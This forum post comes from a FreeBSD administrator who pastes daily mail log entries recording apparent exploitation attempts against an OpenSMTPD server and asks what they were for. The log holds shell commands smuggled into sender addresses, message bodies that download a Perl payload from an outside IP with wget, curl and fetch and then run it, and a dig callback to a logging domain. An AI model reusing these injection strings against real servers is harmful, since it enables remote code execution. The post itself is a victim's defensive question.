In my 11.3 FreeBSD jail with OpenSMTPD I found the following email message and output in daily log as follow:
What was that supposed to accomplish?
Note:
My actual domain name was edited by me with "mydomain.com"
Code:
Checking for rejected mail:
-- End of daily output --
From //80.82.223.34/.jet3;perl .jet3';@mydomain.com Wed Feb 19 04:17:37 2020
Return-Path: <//80.82.223.34/.jet3;perl .jet3';@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (163.53.207.186 [163.53.207.186])
by mydomain.com (OpenSMTPD) with SMTP id beaa7283
for <root@mydomain.com>;
Wed, 19 Feb 2020 04:17:36 -0800 (PST)
Date: Wed, 19 Feb 2020 04:17:37 -0800 (PST)
Message-Id: <54cb8ee6e8598fb3@mydomain.com>
xxx
From ;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com Wed Feb 19 04:25:10 2020
Return-Path: <;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (sps-technoscreen.com [80.82.223.34])
by mydomain.com (OpenSMTPD) with SMTP id 011db50b
for <root@mydomain.com>;
Wed, 19 Feb 2020 04:25:10 -0800 (PST)
Date: Wed, 19 Feb 2020 04:25:10 -0800 (PST)
Message-Id: <54cb8ef061c6b0b1@mydomain.com>
#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
cd /tmp;wget http://80.82.223.34/.smt6;curl -O http://80.82.223.34/.smt6;fetch -o /tmp/.smt6 http://80.82.223.34/.smt6;perl .smt6;rm -rf .smt*
From ;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com Wed Feb 19 08:03:50 2020
Return-Path: <;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (FO111-51.bistrita.astral.ro [85.186.111.51])
by mydomain.com (OpenSMTPD) with SMTP id 80f0bb45
for <root@mydomain.com>;
Wed, 19 Feb 2020 08:03:50 -0800 (PST)
Date: Wed, 19 Feb 2020 08:03:50 -0800 (PST)
Message-Id: <54cb8f12664a434c@mydomain.com>
#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
cd /tmp;wget 80.82.223.34/.smt7;perl .smt7;rm -rf .smt7
From ;dig njuZqIOS.yxpidy.log.ihack.xyz;@mydomain.com Thu Feb 20 01:54:38 2020
Return-Path: <;dig njuZqIOS.yxpidy.log.ihack.xyz;@mydomain.com>
Delivered-To: root@mydomain.com
Received: from x (14.27.37.35 [14.27.37.35])
by mydomain.com (OpenSMTPD) with SMTP id 836df4fe
for <root@mydomain.com>;
Thu, 20 Feb 2020 01:54:38 -0800 (PST)
Date: Thu, 20 Feb 2020 01:54:38 -0800 (PST)
Message-Id: <54cb8f4c0cc57c3b@mydomain.com>
xxx
What was that supposed to accomplish?
Note:
My actual domain name was edited by me with "mydomain.com"